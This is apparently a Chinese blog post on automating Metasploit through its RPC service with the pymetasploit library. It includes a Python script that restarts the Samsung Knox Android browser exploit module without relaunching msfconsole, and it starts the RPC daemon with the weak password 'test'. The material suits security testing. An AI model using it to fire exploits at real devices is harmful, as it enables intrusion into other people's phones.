Metasploit快速测试脚本的TIPS

在这里插入图片描述

相信用过metasploit的同学都很苦逼,msfconsole漫长的启动时间,如果测试中敲错命令,或不小心退出后又重启任务,会让你直接抓狂。之前不想重复敲命令,看了下metasploit的开发文档,发现要自动化有各种方案,个人感觉最方便的是调用RPC接口,GITHUB上搜了把,发现有大拿封装好了模块,直接调用即可:

安装pymetasploit模块

git clone https://github.com/allfro/pymetasploit

切到目录

sudo python setup.py install

启动metasploit的RPC服务

msfrpcd -P test -n -f -a 127.0.0.1

这个test是rpc服务的密码,用户名默认是msf
定制自己的测试脚本
我这里定制的是测试三星knox漏洞的脚本,思路是每次启动先把之前运行的job和console停掉,然后自动创建一个console自动敲入命令进行新的漏洞测试,直接crtl-c结束脚本再重新测试都是一个新的job,而且每次测试都是秒开,不用再重启msfconsole了。中间各种接口怎么用,推荐大家再翻下官方的文档。

from metasploit.msfrpc import MsfRpcClient
import time
 
client = MsfRpcClient('test')
 
jobs = client.call('job.list')
for num in jobs.keys():
    if jobs[num].find('samsung_knox_smdm_url')>0:
        client.call('job.stop',num)
 
console = client.call('console.list')
for _console in console['consoles']:
    if _console.has_key('prompt'):
        if _console['prompt'].find('samsung_knox_smdm_url')>0:
            client.call('console.destroy', _console['id'])
 
cmd='''
use exploit/android/browser/samsung_knox_smdm_url
set LHOST 127.0.0.1
exploit
'''
 
res = client.call('console.create')
console_id = res['id']
client.call('console.write', console_id, cmd)
 
try:
    while True:
        res = client.call('console.read',console_id)
        if len(res['data']) > 1:
                print res['data'],
 
        if res['busy'] == True:
                time.sleep(1)
                continue
except:
    pass
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值